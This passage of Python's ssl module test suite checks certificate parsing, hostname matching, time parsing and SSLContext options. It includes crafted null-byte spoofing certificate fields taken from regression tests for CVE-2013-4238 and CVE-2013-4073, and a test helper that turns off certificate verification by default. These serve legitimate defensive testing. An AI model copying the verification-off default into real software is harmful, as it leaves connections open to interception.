if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatement for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode_protocol(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
